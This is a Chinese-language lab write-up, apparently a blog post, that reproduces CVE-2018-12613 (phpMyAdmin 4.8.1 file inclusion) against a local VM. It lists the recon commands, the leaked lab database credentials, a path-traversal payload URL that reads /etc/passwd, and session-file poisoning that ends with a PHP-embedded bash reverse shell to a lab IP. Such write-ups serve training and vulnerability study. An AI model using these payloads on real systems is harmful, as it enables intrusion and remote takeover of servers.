当前位置: 首页 > news >正文

CVE-2018-12613 漏洞复现

一、靶场搭建

二、信息收集

fping -gaq 192.168.56.0/24

登录进入是这个页面

 whatweb http://192.168.56.119 

dirsearch -u http://192.168.56.119/ 

curl http://192.168.56.119/config.php.bak,发现数据库用户名、密码等重要信息


端口扫描:nmap -sV -p- 192.168.56.119

发现扫出来没太多有用信息,但是在首页中存在contact@votenow.local

修改 /etc/hosts

echo "192.168.56.119 votenow.local" | sudo tee -a /etc/hosts

发现可以访问了

通过目录扫描发现未有任何其他重要信息,尝试对其进行子域名爆破,发现了datasafe.votenow.local域名,将其添加到/etc/hosts中进行访问,发现该域名为phpmyadmin

利用之前收集到的数据库信息尝试登录

$dbUser = "votebox";
$dbPass = "casoj3FFASPsbyoRP";
$dbHost = "localhost";
$dbname = "votebox";

登录成功

三、查找漏洞

扫描phpmyadmin版本信息

whatweb http://datasafe.votenow.local 

发现版本为phpMyAdmin 4.8.1,可能存在CVE-2018-12613漏洞

四、漏洞利用

利用CVE-2018-12613漏洞,构造payload可以读取任意文件http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../etc/passwd

在SQL窗口运行select @@datadir,查看路径/var/lib/mysql/

再输入select  '<?php phpinfo();?>'

打开F12 ,查看返回值:nm04sns8mo5a0i8fic2grtcqu29ue7c2

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_nm04sns8mo5a0i8fic2grtcqu29ue7c2

开启监听端口,在SQL中写入:select '<?php system("bash -i >& /dev/tcp/192.168.56.101/1298 0>&1");exit;?>' 

再去跟上面的步骤访问该文件,开启监听,成功连接

http://www.dtcms.com/a/341083.html

相关文章:

  • 为什么我的UI界面会突然卡顿,失去响应
  • FLASK项目快速构建
  • 用TestComplete打造高效CI/CD测试流程
  • nodejs mongodb基础
  • 【论文阅读】-《SIGN-OPT: A QUERY-EFFICIENT HARD-LABEL ADVERSARIAL ATTACK》
  • Gitea Webhook教程:实现git push后自动部署更新网站 (CI/CD入门)
  • 7.2 Linux:驱动开发——模块机制
  • 7.3 Linux:驱动开发——应用程序和驱动程序的交互
  • imx6ull-驱动开发篇30——Linux 非阻塞IO实验
  • 电商平台商品详情数据爬取教程​
  • JS原型链
  • 第10课_Rust网络编程
  • TrustZone 版的按键点灯程序下载调试 LAT1492
  • 迅为RK3562开发板Android修改uboot logo
  • element UI 和 element plus 在组件上有哪些不同
  • 《算法导论》第 35 章-近似算法
  • 《设计模式之禅》笔记摘录 - 17.模板方法模式
  • hot100 之160-相交链表(双指针切换)
  • 如何合并分卷压缩文件?两种方法让文件更整洁
  • SQL详细语法教程(七)核心优化
  • 【CocosCreator】electron/Cocos双窗口本地模拟聊天系统
  • 挑战极限:在256MB内存的机器上构建MySQL极简安装方案
  • Nginx 负载均衡和缓存配置
  • Unicode 字符串转 UTF-8 编码算法剖析
  • FPGA实现Aurora 64B66B图像视频点对点传输,基于GTH高速收发器,提供2套工程源码和技术支持
  • 科研笔记:博士论文写作攻略
  • IPSEC安全基础前篇
  • 七十三、【Linux数据库】MySQL数据库PXC 集群概述与演示
  • mvdr波束形成
  • week3-[分支结构]2023